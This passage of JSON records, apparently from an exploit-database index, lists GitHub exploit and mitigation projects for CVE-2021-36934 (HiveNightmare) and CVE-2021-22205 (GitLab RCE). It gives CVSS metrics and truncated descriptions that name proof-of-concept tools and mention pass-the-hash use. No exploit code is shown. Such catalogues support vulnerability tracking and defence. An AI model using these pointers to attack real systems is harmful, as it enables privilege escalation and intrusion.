"AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T14:35:30", "id": "6F87E072-E5AF-533F-8FC7-725ACB3BD31F", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:33:41", "description": "<p><strong>Windows Elevation of Privilege Vulnerability CVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-04T10:37:41", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-04T10:47:55", "id": "158640B4-C919-5413-ABA9-DF7D5AE3CC11", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:56:25", "description": "[CVE described on MSRC](https://msrc.microsoft.com/update-guide/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T14:53:09", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-06T14:49:37", "id": "6B43F1C6-9617-5317-90DA-3EB5A74767E2", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:02:55", "description": "# CVE-2021-36934\nFix for...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T13:06:51", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-06-18T04:00:43", "id": "C0AB02D4-4AD3-591D-A60F-953AC6D32CF0", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:58", "description": "# Overview #\n\nThis is a Datto RMM component to mitigate CVE-2021...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-25T18:00:35", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-25T18:10:18", "id": "27F005C9-EA16-5734-81D4-8D66FA582FF9", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:04", "description": "CVE-2021\u201336934\n\nThe derived hash is used for forgery such as PTH...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T19:39:28", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-09-20T04:02:17", "id": "37A629E7-9341-5873-B641-E06D7998FA58", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-26T10:03:10", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T07:49:29", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-11-30T06:53:48", "id": "F289C7E8-209B-5B15-B6D7-8EBFBBC8BDA8", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-15T12:42:04", "description": "# Invoke-HiveNightmare\nPowerShell-based PoC for CVE-2021-36934, ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T03:07:56", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2022-07-15T12:11:50", "id": "DA7FA6E3-30A8-5040-A7DA-7D9C064865B7", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:52:49", "description": "# CVE-2021-36934\nCVE-2021-36934 PowerShell Fix\n\nThis powershell ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-22T12:24:24", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-29T06:47:23", "id": "F58F44AB-5B59-54F5-9E8E-9095AC51C919", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:56:57", "description": "\ufffd\ufffd#\u0000 \u0000C\u0000V\u0000E\u0000-\u00002\u00000\u00002\u00001\u0000-\u00003\u00006\u00009\u00003\u00004\u0000\r\u0000\n\u0000\r\u0000\n\u0000#\u0000#\u0000 \u0000U\u0000s\u0000a\u0000g\u0000e\u0000\r\u0000\n\u0000\r\u0000...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-21T17:24:44", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-08-25T06:37:22", "id": "F1AD9ED7-3058-5CFE-81D5-BCB3AF0861B3", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:10:34", "description": "# CVE-2021-22205\n\n[![Build status](https://ci.appveyor.com/api/p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-10T13:57:55", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2022-01-05T08:42:10", "id": "4BFF94C3-8D58-58E9-B475-3EF032132F84", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T15:32:54", "description": "# CVE-2021-22205\n\n[![Build status](https://ci.appveyor.com/api/p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T04:09:18", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2022-03-14T04:09:34", "id": "FC5EF359-9770-55B8-9E87-4F9044AE36F1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# GitLab-preauth-RCE_CVE-2021-22205\n\nsingle line bash PoC for Gi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-30T11:54:29", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2022-02-07T04:35:04", "id": "0F2A170C-ABEB-54C3-9D07-9F1BA8554053", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:16:28", "description": "# CVE-2021-22205\n\n[![Build status](https://ci.appveyor.com/api/p...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-10T13:57:55", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2022-01-05T08:42:10", "id": "85061E4D-4D82-56B5-94E7-5C1DBD5DD52B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:40:34", "description": "# cve-hash-generator\n\nFinds an identifiable hash value for each ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-18T20:40:55", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2022-09-20T15:23:45", "id": "8AADA11A-F9E6-5C81-9D9D-E1341F5DDDA2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:06:45", "description": "# Automated-Gitlab-RCE\nAutomated Gitlab RCE via ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-05T16:48:11", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-09-06T16:12:12", "id": "44FE14C8-E55B-5B5B-B7BF-87BCCA873425", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T16:30:44", "description": "# Gitlab-CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T04:30:17", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2021-12-22T04:34:47", "id": "8E4650C7-9FBA-5055-83DD-004CFBA8A1D7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:07:29", "description": "# CVE-2021-22205\n\n**Gitlab CE/EE < 13.10.3 \nGitlab CE/EE < 13...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-02-27T07:42:12", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-02-27T09:04:40", "id": "E255678E-F885-5F74-AA7A-7FA7230E3177", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:08:50", "description": "## 0x01 \u524d\u8a00\n\n\u26a0\ufe0f**\u58f0\u660e:\u672c\u9879\u76ee\u4ec5\u4f9b\u5b66\u4e60\u548c\u4ea4\u6d41\u4f7f\u7528\uff0c\u8bf7\u52ff\u7528\u4e8e\u975e\u6cd5\u672a\u6388\u6743\u6d4b\u8bd5\uff01**\n\n**\u66f4\u65b0\u8bb0\u5f55**\n\n11.2\n-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-10-31T04:15:30", "type": "githubexploit", "title": "Exploit for Code Injection in Gitlab", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22205"], "modified": "2023-09-12T11:13:45", "id": "B847AD89-69EB-53D0-9F76-3A94B2C9B65B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T18:55:28", "description": "# CVE-2021-36934\n![Screenshot](https://github...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-26T08:01:08", "type": "githubexploit", "title": "Exploit for Incorrect Permission Assignment for Critical Resource in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-26T08:18:37", "id": "BF498AAC-B85E-5E3F-87EC-BC028A10A6D6", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, 